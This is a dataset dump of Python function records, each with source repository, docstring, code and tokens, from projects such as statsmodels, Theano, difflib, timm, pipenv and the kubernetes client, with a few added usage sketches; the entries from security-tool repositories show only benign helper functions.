Dataset schema. Each record has the fields below; for string fields the
range is the minimum and maximum length observed across the dataset, and
"1 value" marks a column with a single distinct value.

    field               type     observed range / values
    nwo                 string   5 - 106 chars (GitHub repo, owner/name)
    sha                 string   40 chars (commit hash)
    path                string   4 - 174 chars
    language            string   1 value ("python")
    identifier          string   1 - 140 chars
    parameters          string   0 - 87.7k chars
    argument_list       string   1 value
    return_statement    string   0 - 426k chars
    docstring           string   0 - 64.3k chars
    docstring_summary   string   0 - 26.3k chars
    docstring_tokens    list
    function            string   18 - 4.83M chars
    function_tokens     list
    url                 string   83 - 304 chars

The records follow, one labeled field per line; empty fields are omitted.

nwo: statsmodels/statsmodels
sha: debbe7ea6ba28fe5bdb78f09f8cac694bef98722
path: statsmodels/tsa/vector_ar/vecm.py
language: python
identifier: JohansenTestResult.trace_stat_crit_vals
parameters: (self)
return_statement: return self._cvt
docstring: Critical values (90%, 95%, 99%) of trace statistic
docstring_summary: Critical values (90%, 95%, 99%) of trace statistic
docstring_tokens:
[ "Critical", "values", "(", "90%", "95%", "99%", ")", "of", "trace", "statistic" ]
function:

    def trace_stat_crit_vals(self):
        """Critical values (90%, 95%, 99%) of trace statistic"""
        return self._cvt

function_tokens:
[ "def", "trace_stat_crit_vals", "(", "self", ")", ":", "return", "self", ".", "_cvt" ]
url: https://github.com/statsmodels/statsmodels/blob/debbe7ea6ba28fe5bdb78f09f8cac694bef98722/statsmodels/tsa/vector_ar/vecm.py#L803-L805

nwo: mkusner/grammarVAE
sha: ffffe272a8cf1772578dfc92254c55c224cddc02
path: Theano-master/theano/sandbox/linalg/ops.py
language: python
identifier: tag_solve_triangular
parameters: (node)
docstring: If a general solve() is applied to the output of a cholesky op, then replace it with a triangular solve.
docstring_summary: If a general solve() is applied to the output of a cholesky op, then replace it with a triangular solve.
docstring_tokens:
[ "If", "a", "general", "solve", "()", "is", "applied", "to", "the", "output", "of", "a", "cholesky", "op", "then", "replace", "it", "with", "a", "triangular", "solve", "." ]
function:

    def tag_solve_triangular(node):
        """
        If a general solve() is applied to the output of a cholesky op, then
        replace it with a triangular solve.
        """
        if node.op == solve:
            if node.op.A_structure == 'general':
                A, b = node.inputs  # result is solution Ax=b
                if A.owner and isinstance(A.owner.op, type(cholesky)):
                    if A.owner.op.lower:
                        return [Solve('lower_triangular')(A, b)]
                    else:
                        return [Solve('upper_triangular')(A, b)]
                if (A.owner and isinstance(A.owner.op, DimShuffle)
                        and A.owner.op.new_order == (1, 0)):
                    A_T, = A.owner.inputs
                    if A_T.owner and isinstance(A_T.owner.op, type(cholesky)):
                        if A_T.owner.op.lower:
                            return [Solve('upper_triangular')(A, b)]
                        else:
                            return [Solve('lower_triangular')(A, b)]

function_tokens:
[ "def", "tag_solve_triangular", "(", "node", ")", ":", "if", "node", ".", "op", "==", "solve", ":", "if", "node", ".", "op", ".", "A_structure", "==", "'general'", ":", "A", ",", "b", "=", "node", ".", "inputs", "# result is solution Ax=b", "if", "A", ".", "owner", "and", "isinstance", "(", "A", ".", "owner", ".", "op", ",", "type", "(", "cholesky", ")", ")", ":", "if", "A", ".", "owner", ".", "op", ".", "lower", ":", "return", "[", "Solve", "(", "'lower_triangular'", ")", "(", "A", ",", "b", ")", "]", "else", ":", "return", "[", "Solve", "(", "'upper_triangular'", ")", "(", "A", ",", "b", ")", "]", "if", "(", "A", ".", "owner", "and", "isinstance", "(", "A", ".", "owner", ".", "op", ",", "DimShuffle", ")", "and", "A", ".", "owner", ".", "op", ".", "new_order", "==", "(", "1", ",", "0", ")", ")", ":", "A_T", ",", "=", "A", ".", "owner", ".", "inputs", "if", "A_T", ".", "owner", "and", "isinstance", "(", "A_T", ".", "owner", ".", "op", ",", "type", "(", "cholesky", ")", ")", ":", "if", "A_T", ".", "owner", ".", "op", ".", "lower", ":", "return", "[", "Solve", "(", "'upper_triangular'", ")", "(", "A", ",", "b", ")", "]", "else", ":", "return", "[", "Solve", "(", "'lower_triangular'", ")", "(", "A", ",", "b", ")", "]" ]
url: https://github.com/mkusner/grammarVAE/blob/ffffe272a8cf1772578dfc92254c55c224cddc02/Theano-master/theano/sandbox/linalg/ops.py#L299-L320

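The rewrite above is safe because the output of a Cholesky op is already triangular, so a general solve on it can be swapped for a cheaper triangular solve. A minimal NumPy/SciPy sketch of the same equivalence (an illustration only, not Theano code):

    import numpy as np
    from scipy.linalg import cholesky, solve, solve_triangular

    rng = np.random.default_rng(0)
    M = rng.standard_normal((5, 5))
    A = M @ M.T + 5 * np.eye(5)      # symmetric positive definite
    b = rng.standard_normal(5)

    L = cholesky(A, lower=True)      # L is the "output of a cholesky op"

    # A general solve on the triangular factor ...
    x_general = solve(L, b)
    # ... matches a triangular solve, which only needs back-substitution.
    x_triangular = solve_triangular(L, b, lower=True)

    assert np.allclose(x_general, x_triangular)
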
nwo: IronLanguages/main
sha: a949455434b1fda8c783289e897e78a9a0caabb5
path: External.LCA_RESTRICTED/Languages/IronPython/27/Lib/difflib.py
language: python
identifier: HtmlDiff.__init__
parameters: (self, tabsize=8, wrapcolumn=None, linejunk=None, charjunk=IS_CHARACTER_JUNK)
docstring: HtmlDiff instance initializer Arguments: tabsize -- tab stop spacing, defaults to 8. wrapcolumn -- column number where lines are broken and wrapped, defaults to None where lines are not wrapped. linejunk,charjunk -- keyword arguments passed into ndiff() (used by HtmlDiff() to generate the side by side HTML differences). See ndiff() documentation for argument default values and descriptions.
docstring_summary: HtmlDiff instance initializer
docstring_tokens:
[ "HtmlDiff", "instance", "initializer" ]
function:

    def __init__(self, tabsize=8, wrapcolumn=None, linejunk=None,
                 charjunk=IS_CHARACTER_JUNK):
        """HtmlDiff instance initializer

        Arguments:
        tabsize -- tab stop spacing, defaults to 8.
        wrapcolumn -- column number where lines are broken and wrapped,
            defaults to None where lines are not wrapped.
        linejunk,charjunk -- keyword arguments passed into ndiff() (used by
            HtmlDiff() to generate the side by side HTML differences). See
            ndiff() documentation for argument default values and descriptions.
        """
        self._tabsize = tabsize
        self._wrapcolumn = wrapcolumn
        self._linejunk = linejunk
        self._charjunk = charjunk

function_tokens:
[ "def", "__init__", "(", "self", ",", "tabsize", "=", "8", ",", "wrapcolumn", "=", "None", ",", "linejunk", "=", "None", ",", "charjunk", "=", "IS_CHARACTER_JUNK", ")", ":", "self", ".", "_tabsize", "=", "tabsize", "self", ".", "_wrapcolumn", "=", "wrapcolumn", "self", ".", "_linejunk", "=", "linejunk", "self", ".", "_charjunk", "=", "charjunk" ]
url: https://github.com/IronLanguages/main/blob/a949455434b1fda8c783289e897e78a9a0caabb5/External.LCA_RESTRICTED/Languages/IronPython/27/Lib/difflib.py#L1692-L1707

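A short usage sketch for the initializer above, using the standard-library difflib (the file name and input lines are made up for illustration):

    import difflib

    left = "one\ntwo\nthree\n".splitlines()
    right = "one\n2\nthree\nfour\n".splitlines()

    # tabsize and wrapcolumn map directly onto the parameters documented above
    differ = difflib.HtmlDiff(tabsize=4, wrapcolumn=40)
    html = differ.make_file(left, right, fromdesc="old", todesc="new")
    with open("diff.html", "w", encoding="utf-8") as f:
        f.write(html)
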
nwo: Marten4n6/EvilOSX
sha: 033a662030e99b3704a1505244ebc1e6e59fba57
path: bot/loaders/helper.py
language: python
identifier: LoaderABC.get_options
parameters: (self, set_options)
docstring: The returned dictionary must contain a "loader_name" key which contains the name of this loader. :type :rtype: dict :return: A dictionary containing set configuration options.
docstring_summary: The returned dictionary must contain a "loader_name" key which contains the name of this loader.
docstring_tokens:
[ "The", "returned", "dictionary", "must", "contain", "a", "loader_name", "key", "which", "contains", "the", "name", "of", "this", "loader", "." ]
function:

    def get_options(self, set_options):
        """The returned dictionary must contain a "loader_name" key which
        contains the name of this loader.

        :type
        :rtype: dict
        :return: A dictionary containing set configuration options.
        """
        pass

function_tokens:
[ "def", "get_options", "(", "self", ",", "set_options", ")", ":", "pass" ]
url: https://github.com/Marten4n6/EvilOSX/blob/033a662030e99b3704a1505244ebc1e6e59fba57/bot/loaders/helper.py#L50-L57

nwo: microsoft/msticpy
sha: 2a401444ee529114004f496f4c0376ff25b5268a
path: msticpy/sectools/vtlookupv3/vtobject_browser.py
language: python
identifier: _extract_summary
parameters: (data: Optional[pd.DataFrame] = None)
return_statement: return data[["sha256", "meaningful_name", "names", "magic"]].iloc[0].to_dict()
docstring: Return summary of item.
docstring_summary: Return summary of item.
docstring_tokens:
[ "Return", "summary", "of", "item", "." ]
function:

    def _extract_summary(data: Optional[pd.DataFrame] = None) -> Dict[str, str]:
        """Return summary of item."""
        def_dict = {"sha256": "", "meaningful_name": "", "names": "", "magic": ""}
        if data is None:
            return def_dict
        if (
            "first_submission_date" not in data.columns
            or data.iloc[0]["first_submission_date"] == _NOT_FOUND
        ):
            def_dict["sha256"] = _NOT_FOUND
            return def_dict
        return data[["sha256", "meaningful_name", "names", "magic"]].iloc[0].to_dict()

function_tokens:
[ "def", "_extract_summary", "(", "data", ":", "Optional", "[", "pd", ".", "DataFrame", "]", "=", "None", ")", "->", "Dict", "[", "str", ",", "str", "]", ":", "def_dict", "=", "{", "\"sha256\"", ":", "\"\"", ",", "\"meaningful_name\"", ":", "\"\"", ",", "\"names\"", ":", "\"\"", ",", "\"magic\"", ":", "\"\"", "}", "if", "data", "is", "None", ":", "return", "def_dict", "if", "(", "\"first_submission_date\"", "not", "in", "data", ".", "columns", "or", "data", ".", "iloc", "[", "0", "]", "[", "\"first_submission_date\"", "]", "==", "_NOT_FOUND", ")", ":", "def_dict", "[", "\"sha256\"", "]", "=", "_NOT_FOUND", "return", "def_dict", "return", "data", "[", "[", "\"sha256\"", ",", "\"meaningful_name\"", ",", "\"names\"", ",", "\"magic\"", "]", "]", ".", "iloc", "[", "0", "]", ".", "to_dict", "(", ")" ]
url: https://github.com/microsoft/msticpy/blob/2a401444ee529114004f496f4c0376ff25b5268a/msticpy/sectools/vtlookupv3/vtobject_browser.py#L112-L123

nwo: jgagneastro/coffeegrindsize
sha: 22661ebd21831dba4cf32bfc6ba59fe3d49f879c
path: App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/PIL/ImageChops.py
language: python
identifier: logical_and
parameters: (image1, image2)
return_statement: return image1._new(image1.im.chop_and(image2.im))
docstring: Logical AND between two images. At least one of the images must have mode "1". .. code-block:: python out = ((image1 and image2) % MAX) :rtype: :py:class:`~PIL.Image.Image`
docstring_summary: Logical AND between two images. At least one of the images must have mode "1".
docstring_tokens:
[ "Logical", "AND", "between", "two", "images", ".", "At", "least", "one", "of", "the", "images", "must", "have", "mode", "1", "." ]
function:

    def logical_and(image1, image2):
        """Logical AND between two images. At least one of the images must have
        mode "1".

        .. code-block:: python

            out = ((image1 and image2) % MAX)

        :rtype: :py:class:`~PIL.Image.Image`
        """
        image1.load()
        image2.load()
        return image1._new(image1.im.chop_and(image2.im))

function_tokens:
[ "def", "logical_and", "(", "image1", ",", "image2", ")", ":", "image1", ".", "load", "(", ")", "image2", ".", "load", "(", ")", "return", "image1", ".", "_new", "(", "image1", ".", "im", ".", "chop_and", "(", "image2", ".", "im", ")", ")" ]
url: https://github.com/jgagneastro/coffeegrindsize/blob/22661ebd21831dba4cf32bfc6ba59fe3d49f879c/App/dist/coffeegrindsize.app/Contents/Resources/lib/python3.7/PIL/ImageChops.py#L210-L223

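A quick usage sketch with Pillow; both inputs are created directly in mode "1" as the docstring requires (sizes and pixel values are arbitrary):

    from PIL import Image, ImageChops

    im1 = Image.new("1", (4, 4), 1)   # all white
    im2 = Image.new("1", (4, 4), 0)   # all black
    im2.putpixel((0, 0), 1)           # one white pixel

    out = ImageChops.logical_and(im1, im2)
    # mode "1" pixels read back as 0 or 255
    print(out.getpixel((0, 0)), out.getpixel((1, 1)))  # 255 0
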
nwo: tobspr/RenderPipeline
sha: d8c38c0406a63298f4801782a8e44e9c1e467acf
path: toolkit/day_time_editor/main.py
language: python
identifier: DayTimeEditor._update_settings_list
parameters: (self)
docstring: Updates the list of visible settings
docstring_summary: Updates the list of visible settings
docstring_tokens:
[ "Updates", "the", "list", "of", "visible", "settings" ]
function:

    def _update_settings_list(self):
        """ Updates the list of visible settings """
        self.settings_tree.clear()
        self._tree_widgets = []
        first_item = None
        for plugin_id, plugin in iteritems(self._plugin_mgr.instances):
            daytime_settings = self._plugin_mgr.day_settings[plugin_id]
            if not daytime_settings:
                # Skip plugins with empty settings
                continue
            plugin_head = QTreeWidgetItem(self.settings_tree)
            plugin_head.setText(0, plugin.name)
            plugin_head.setFlags(Qt.ItemIsEnabled)
            font = QFont()
            font.setBold(True)
            if not self._plugin_mgr.is_plugin_enabled(plugin_id):
                plugin_head.setText(0, plugin.name)
                plugin_head.setFont(0, font)
            # Display all settings
            for setting, setting_handle in iteritems(daytime_settings):
                setting_item = QTreeWidgetItem(plugin_head)
                setting_item.setText(0, setting_handle.label)
                if PYQT_VERSION == 4:
                    setting_item.setTextColor(0, QColor(150, 150, 150))
                else:
                    setting_item.setForeground(0, QColor(150, 150, 150))
                setting_item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
                setting_item._setting_id = setting
                setting_item._setting_handle = setting_handle
                setting_item._plugin_id = plugin_id
                setting_item.setToolTip(0, setting_handle.description)
                setting_item.setToolTip(1, setting_handle.description)
                self._tree_widgets.append((setting_handle, setting_item))
                if not first_item:
                    first_item = setting_item
        self.settings_tree.expandAll()
        if first_item:
            self.settings_tree.setCurrentItem(first_item)

function_tokens:
[ "def", "_update_settings_list", "(", "self", ")", ":", "self", ".", "settings_tree", ".", "clear", "(", ")", "self", ".", "_tree_widgets", "=", "[", "]", "first_item", "=", "None", "for", "plugin_id", ",", "plugin", "in", "iteritems", "(", "self", ".", "_plugin_mgr", ".", "instances", ")", ":", "daytime_settings", "=", "self", ".", "_plugin_mgr", ".", "day_settings", "[", "plugin_id", "]", "if", "not", "daytime_settings", ":", "# Skip plugins with empty settings", "continue", "plugin_head", "=", "QTreeWidgetItem", "(", "self", ".", "settings_tree", ")", "plugin_head", ".", "setText", "(", "0", ",", "plugin", ".", "name", ")", "plugin_head", ".", "setFlags", "(", "Qt", ".", "ItemIsEnabled", ")", "font", "=", "QFont", "(", ")", "font", ".", "setBold", "(", "True", ")", "if", "not", "self", ".", "_plugin_mgr", ".", "is_plugin_enabled", "(", "plugin_id", ")", ":", "plugin_head", ".", "setText", "(", "0", ",", "plugin", ".", "name", ")", "plugin_head", ".", "setFont", "(", "0", ",", "font", ")", "# Display all settings", "for", "setting", ",", "setting_handle", "in", "iteritems", "(", "daytime_settings", ")", ":", "setting_item", "=", "QTreeWidgetItem", "(", "plugin_head", ")", "setting_item", ".", "setText", "(", "0", ",", "setting_handle", ".", "label", ")", "if", "PYQT_VERSION", "==", "4", ":", "setting_item", ".", "setTextColor", "(", "0", ",", "QColor", "(", "150", ",", "150", ",", "150", ")", ")", "else", ":", "setting_item", ".", "setForeground", "(", "0", ",", "QColor", "(", "150", ",", "150", ",", "150", ")", ")", "setting_item", ".", "setFlags", "(", "Qt", ".", "ItemIsEnabled", "|", "Qt", ".", "ItemIsSelectable", ")", "setting_item", ".", "_setting_id", "=", "setting", "setting_item", ".", "_setting_handle", "=", "setting_handle", "setting_item", ".", "_plugin_id", "=", "plugin_id", "setting_item", ".", "setToolTip", "(", "0", ",", "setting_handle", ".", "description", ")", "setting_item", ".", "setToolTip", "(", "1", ",", "setting_handle", ".", "description", ")", "self", ".", "_tree_widgets", ".", "append", "(", "(", "setting_handle", ",", "setting_item", ")", ")", "if", "not", "first_item", ":", "first_item", "=", "setting_item", "self", ".", "settings_tree", ".", "expandAll", "(", ")", "if", "first_item", ":", "self", ".", "settings_tree", ".", "setCurrentItem", "(", "first_item", ")" ]
url: https://github.com/tobspr/RenderPipeline/blob/d8c38c0406a63298f4801782a8e44e9c1e467acf/toolkit/day_time_editor/main.py#L241-L286

nwo: mdiazcl/fuzzbunch-debian
sha: 2b76c2249ade83a389ae3badb12a1bd09901fd2c
path: windows/Resources/Python/Core/Lib/distutils/dist.py
language: python
identifier: Distribution._get_toplevel_options
parameters: (self)
return_statement: return self.global_options + [ ('command-packages=', None, 'list of packages that provide distutils commands')]
docstring: Return the non-display options recognized at the top level. This includes options that are recognized *only* at the top level as well as options recognized for commands.
docstring_summary: Return the non-display options recognized at the top level. This includes options that are recognized *only* at the top level as well as options recognized for commands.
docstring_tokens:
[ "Return", "the", "non", "-", "display", "options", "recognized", "at", "the", "top", "level", ".", "This", "includes", "options", "that", "are", "recognized", "*", "only", "*", "at", "the", "top", "level", "as", "well", "as", "options", "recognized", "for", "commands", "." ]
function:

    def _get_toplevel_options(self):
        """Return the non-display options recognized at the top level.

        This includes options that are recognized *only* at the top level as
        well as options recognized for commands.
        """
        return self.global_options + [
            ('command-packages=', None,
             'list of packages that provide distutils commands')]

function_tokens:
[ "def", "_get_toplevel_options", "(", "self", ")", ":", "return", "self", ".", "global_options", "+", "[", "(", "'command-packages='", ",", "None", ",", "'list of packages that provide distutils commands'", ")", "]" ]
url: https://github.com/mdiazcl/fuzzbunch-debian/blob/2b76c2249ade83a389ae3badb12a1bd09901fd2c/windows/Resources/Python/Core/Lib/distutils/dist.py#L310-L317

nwo: kuri65536/python-for-android
sha: 26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891
path: python-modules/twisted/twisted/words/xish/domish.py
language: python
identifier: Element.__str__
parameters: (self)
return_statement: return ""
docstring: Retrieve the first CData (content) node
docstring_summary: Retrieve the first CData (content) node
docstring_tokens:
[ "Retrieve", "the", "first", "CData", "(", "content", ")", "node" ]
function:

    def __str__(self):
        """ Retrieve the first CData (content) node """
        for n in self.children:
            if isinstance(n, types.StringTypes):
                return n
        return ""

function_tokens:
[ "def", "__str__", "(", "self", ")", ":", "for", "n", "in", "self", ".", "children", ":", "if", "isinstance", "(", "n", ",", "types", ".", "StringTypes", ")", ":", "return", "n", "return", "\"\"" ]
url: https://github.com/kuri65536/python-for-android/blob/26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891/python-modules/twisted/twisted/words/xish/domish.py#L434-L439

nwo: PacktPublishing/Advanced-Deep-Learning-with-Keras
sha: 099980731ba4f4e1a847506adf693247e41ef0cb
path: chapter13-mi-unsupervised/mine-13.8.1.py
language: python
identifier: SimpleMINE.__init__
parameters: (self, args, input_dim=1, hidden_units=16, output_dim=1)
docstring: Learn to compute MI using MINE (Algorithm 13.7.1) Arguments: args : User-defined arguments such as off-diagonal elements of covariance matrix, batch size, epochs, etc input_dim (int): Input size dimension hidden_units (int): Number of hidden units of the MINE MLP network output_dim (int): Output size dimension
docstring_summary: Learn to compute MI using MINE (Algorithm 13.7.1)
docstring_tokens:
[ "Learn", "to", "compute", "MI", "using", "MINE", "(", "Algorithm", "13", ".", "7", ".", "1", ")" ]
function:

    def __init__(self, args, input_dim=1, hidden_units=16, output_dim=1):
        """Learn to compute MI using MINE (Algorithm 13.7.1)

        Arguments:
            args : User-defined arguments such as off-diagonal elements of
                covariance matrix, batch size, epochs, etc
            input_dim (int): Input size dimension
            hidden_units (int): Number of hidden units of the MINE MLP network
            output_dim (int): Output size dimension
        """
        self.args = args
        self._model = None
        self.build_model(input_dim, hidden_units, output_dim)

function_tokens:
[ "def", "__init__", "(", "self", ",", "args", ",", "input_dim", "=", "1", ",", "hidden_units", "=", "16", ",", "output_dim", "=", "1", ")", ":", "self", ".", "args", "=", "args", "self", ".", "_model", "=", "None", "self", ".", "build_model", "(", "input_dim", ",", "hidden_units", ",", "output_dim", ")" ]
url: https://github.com/PacktPublishing/Advanced-Deep-Learning-with-Keras/blob/099980731ba4f4e1a847506adf693247e41ef0cb/chapter13-mi-unsupervised/mine-13.8.1.py#L89-L109

nwo: w3h/isf
sha: 6faf0a3df185465ec17369c90ccc16e2a03a1870
path: lib/thirdparty/pyreadline/console/console.py
language: python
identifier: Console.get
parameters: (self)
docstring: Get next event from queue.
docstring_summary: Get next event from queue.
docstring_tokens:
[ "Get", "next", "event", "from", "queue", "." ]
function:

    def get(self):
        '''Get next event from queue.'''
        inputHookFunc = c_void_p.from_address(self.inputHookPtr).value
        Cevent = INPUT_RECORD()
        count = DWORD(0)
        while 1:
            if inputHookFunc:
                call_function(inputHookFunc, ())
            status = self.ReadConsoleInputW(self.hin, byref(Cevent),
                                            1, byref(count))
            if status and count.value == 1:
                e = event(self, Cevent)
                return e

function_tokens:
[ "def", "get", "(", "self", ")", ":", "inputHookFunc", "=", "c_void_p", ".", "from_address", "(", "self", ".", "inputHookPtr", ")", ".", "value", "Cevent", "=", "INPUT_RECORD", "(", ")", "count", "=", "DWORD", "(", "0", ")", "while", "1", ":", "if", "inputHookFunc", ":", "call_function", "(", "inputHookFunc", ",", "(", ")", ")", "status", "=", "self", ".", "ReadConsoleInputW", "(", "self", ".", "hin", ",", "byref", "(", "Cevent", ")", ",", "1", ",", "byref", "(", "count", ")", ")", "if", "status", "and", "count", ".", "value", "==", "1", ":", "e", "=", "event", "(", "self", ",", "Cevent", ")", "return", "e" ]
url: https://github.com/w3h/isf/blob/6faf0a3df185465ec17369c90ccc16e2a03a1870/lib/thirdparty/pyreadline/console/console.py#L506-L519

nwo: GoSecure/pyrdp
sha: abd8b8762b6d7fd0e49d4a927b529f892b412743
path: pyrdp/convert/utils.py
language: python
identifier: extractInetAddressesFromPDUPacket
parameters: (packet)
return_statement: return (InetAddress(x.src, x.sport), InetAddress(x.dst, x.dport))
docstring: Returns the src and dst InetAddress (IP, port) from a PDU packet
docstring_summary: Returns the src and dst InetAddress (IP, port) from a PDU packet
docstring_tokens:
[ "Returns", "the", "src", "and", "dst", "InetAddress", "(", "IP", "port", ")", "from", "a", "PDU", "packet" ]
function:

    def extractInetAddressesFromPDUPacket(packet) -> Tuple[InetAddress, InetAddress]:
        """Returns the src and dst InetAddress (IP, port) from a PDU packet"""
        x = ExportedPDU(packet.load)
        return (InetAddress(x.src, x.sport), InetAddress(x.dst, x.dport))

function_tokens:
[ "def", "extractInetAddressesFromPDUPacket", "(", "packet", ")", "->", "Tuple", "[", "InetAddress", ",", "InetAddress", "]", ":", "x", "=", "ExportedPDU", "(", "packet", ".", "load", ")", "return", "(", "InetAddress", "(", "x", ".", "src", ",", "x", ".", "sport", ")", ",", "InetAddress", "(", "x", ".", "dst", ",", "x", ".", "dport", ")", ")" ]
url: https://github.com/GoSecure/pyrdp/blob/abd8b8762b6d7fd0e49d4a927b529f892b412743/pyrdp/convert/utils.py#L71-L74

nwo: aimi-cn/AILearners
sha: 5aec29a13fbb145a7a55e41ceedb5b42f5bbb1a0
path: src/py2.x/ml/jqxxsz/9.RegTrees/demo.py
language: python
identifier: loadDataSet
parameters: (fileName)
return_statement: return dataMat
docstring: loadDataSet (parse each line and convert it to float) Desc: reads a tab-delimited file and stores the contents of each line as a list of floats Args: fileName -- the file name Returns: dataMat -- the data set for each line, as an array Raises:
docstring_summary: loadDataSet (parse each line and convert it to float) Desc: reads a tab-delimited file and stores the contents of each line as a list of floats Args: fileName -- the file name Returns: dataMat -- the data set for each line, as an array Raises:
docstring_tokens:
[ "loadDataSet", "(", "解析每一行,并转化为float类型", ")", "Desc:该函数读取一个以", "tab", "键为分隔符的文件,然后将每行的内容保存成一组浮点数", "Args", ":", "fileName", "文件名", "Returns", ":", "dataMat", "每一行的数据集array类型", "Raises", ":" ]
function:

    def loadDataSet(fileName):
        """loadDataSet (parse each line and convert it to float)

        Desc: reads a tab-delimited file and stores the contents of each
            line as a list of floats
        Args:
            fileName -- the file name
        Returns:
            dataMat -- the data set for each line, as an array
        Raises:
        """
        # assume last column is target value
        dataMat = []
        fr = open(fileName)
        for line in fr.readlines():
            curLine = line.strip().split('\t')
            # map all elements to float()
            # for details on map(), see https://my.oschina.net/zyzzy/blog/115096
            fltLine = map(float, curLine)
            dataMat.append(fltLine)
        return dataMat

function_tokens:
[ "def", "loadDataSet", "(", "fileName", ")", ":", "# 假定最后一列是结果值", "# assume last column is target value", "dataMat", "=", "[", "]", "fr", "=", "open", "(", "fileName", ")", "for", "line", "in", "fr", ".", "readlines", "(", ")", ":", "curLine", "=", "line", ".", "strip", "(", ")", ".", "split", "(", "'\\t'", ")", "# 将所有的元素转化为float类型", "# map all elements to float()", "# map() 函数具体的含义,可见 https://my.oschina.net/zyzzy/blog/115096", "fltLine", "=", "map", "(", "float", ",", "curLine", ")", "dataMat", ".", "append", "(", "fltLine", ")", "return", "dataMat" ]
url: https://github.com/aimi-cn/AILearners/blob/5aec29a13fbb145a7a55e41ceedb5b42f5bbb1a0/src/py2.x/ml/jqxxsz/9.RegTrees/demo.py#L22-L42

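Note the path says py2.x: under Python 3, map() is lazy, so fltLine would be a map object rather than a list of floats. A hypothetical Python 3 port (renamed load_dataset to signal it is not the original) avoids that and closes the file handle:

    def load_dataset(file_name):
        """Read a tab-delimited file into a list of float rows."""
        data_mat = []
        with open(file_name) as fh:
            for line in fh:
                # list comprehension is eager, unlike Python 3's map()
                data_mat.append([float(tok) for tok in line.strip().split('\t')])
        return data_mat
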
nwo: pypa/pipenv
sha: b21baade71a86ab3ee1429f71fbc14d4f95fb75d
path: pipenv/patched/notpip/_internal/utils/misc.py
language: python
identifier: hide_value
parameters: (value)
return_statement: return HiddenText(value, redacted="****")
docstring_tokens:
[]
function:

    def hide_value(value):
        # type: (str) -> HiddenText
        return HiddenText(value, redacted="****")

function_tokens:
[ "def", "hide_value", "(", "value", ")", ":", "# type: (str) -> HiddenText", "return", "HiddenText", "(", "value", ",", "redacted", "=", "\"****\"", ")" ]
url: https://github.com/pypa/pipenv/blob/b21baade71a86ab3ee1429f71fbc14d4f95fb75d/pipenv/patched/notpip/_internal/utils/misc.py#L734-L736

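HiddenText is a pip-internal type; a minimal sketch of the idea (assumed and simplified, not pip's actual class) shows why the redaction helps when the value may end up in logs:

    # Simplified stand-in for pip's HiddenText; the real class has more behavior.
    class HiddenText:
        def __init__(self, secret, redacted):
            self.secret = secret        # the real value, still retrievable
            self.redacted = redacted    # what str() and log lines should show

        def __str__(self):
            return self.redacted

    token = HiddenText("s3cr3t-password", redacted="****")
    print("connecting with %s" % token)   # connecting with ****
    print(token.secret)                   # s3cr3t-password
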
nwo: GiulioRossetti/ndlib
sha: f5817eec0c8e7e86fb03aafe7be208fd4a0e0f6e
path: ndlib/models/dynamic/DynSIModel.py
language: python
identifier: DynSIModel.__init__
parameters: (self, graph, seed=None)
docstring: Model Constructor :param graph: A dynetx graph object
docstring_summary: Model Constructor
docstring_tokens:
[ "Model", "Constructor" ]
function:

    def __init__(self, graph, seed=None):
        """
        Model Constructor

        :param graph: A dynetx graph object
        """
        super(self.__class__, self).__init__(graph, seed)
        self.available_statuses = {
            "Susceptible": 0,
            "Infected": 1
        }
        self.parameters = {
            "model": {
                "beta": {
                    "descr": "Infection rate",
                    "range": "[0,1]",
                    "optional": False}
            },
            "nodes": {},
            "edges": {},
        }
        self.name = "SI"

function_tokens:
[ "def", "__init__", "(", "self", ",", "graph", ",", "seed", "=", "None", ")", ":", "super", "(", "self", ".", "__class__", ",", "self", ")", ".", "__init__", "(", "graph", ",", "seed", ")", "self", ".", "available_statuses", "=", "{", "\"Susceptible\"", ":", "0", ",", "\"Infected\"", ":", "1", "}", "self", ".", "parameters", "=", "{", "\"model\"", ":", "{", "\"beta\"", ":", "{", "\"descr\"", ":", "\"Infection rate\"", ",", "\"range\"", ":", "\"[0,1]\"", ",", "\"optional\"", ":", "False", "}", "}", ",", "\"nodes\"", ":", "{", "}", ",", "\"edges\"", ":", "{", "}", ",", "}", "self", ".", "name", "=", "\"SI\"" ]
url: https://github.com/GiulioRossetti/ndlib/blob/f5817eec0c8e7e86fb03aafe7be208fd4a0e0f6e/ndlib/models/dynamic/DynSIModel.py#L18-L41

nwo: rwightman/pytorch-image-models
sha: ccfeb06936549f19c453b7f1f27e8e632cfbe1c2
path: timm/models/rexnet.py
language: python
identifier: rexnet_100
parameters: (pretrained=False, **kwargs)
return_statement: return _create_rexnet('rexnet_100', pretrained, **kwargs)
docstring: ReXNet V1 1.0x
docstring_summary: ReXNet V1 1.0x
docstring_tokens:
[ "ReXNet", "V1", "1", ".", "0x" ]
function:

    def rexnet_100(pretrained=False, **kwargs):
        """ReXNet V1 1.0x"""
        return _create_rexnet('rexnet_100', pretrained, **kwargs)

function_tokens:
[ "def", "rexnet_100", "(", "pretrained", "=", "False", ",", "*", "*", "kwargs", ")", ":", "return", "_create_rexnet", "(", "'rexnet_100'", ",", "pretrained", ",", "*", "*", "kwargs", ")" ]
url: https://github.com/rwightman/pytorch-image-models/blob/ccfeb06936549f19c453b7f1f27e8e632cfbe1c2/timm/models/rexnet.py#L195-L197

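A usage sketch via timm's model registry, which is how registered constructors like the one above are normally reached (pretrained=False here to avoid a weight download):

    import timm
    import torch

    model = timm.create_model('rexnet_100', pretrained=False)
    model.eval()
    with torch.no_grad():
        out = model(torch.randn(1, 3, 224, 224))
    print(out.shape)  # torch.Size([1, 1000])
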
nwo: kubernetes-client/python
sha: 47b9da9de2d02b2b7a34fbe05afb44afd130d73a
path: kubernetes/client/models/v1_volume.py
language: python
identifier: V1Volume.azure_disk
parameters: (self, azure_disk)
docstring: Sets the azure_disk of this V1Volume. :param azure_disk: The azure_disk of this V1Volume. # noqa: E501 :type: V1AzureDiskVolumeSource
docstring_summary: Sets the azure_disk of this V1Volume.
docstring_tokens:
[ "Sets", "the", "azure_disk", "of", "this", "V1Volume", "." ]
function:

    def azure_disk(self, azure_disk):
        """Sets the azure_disk of this V1Volume.

        :param azure_disk: The azure_disk of this V1Volume.  # noqa: E501
        :type: V1AzureDiskVolumeSource
        """
        self._azure_disk = azure_disk

function_tokens:
[ "def", "azure_disk", "(", "self", ",", "azure_disk", ")", ":", "self", ".", "_azure_disk", "=", "azure_disk" ]
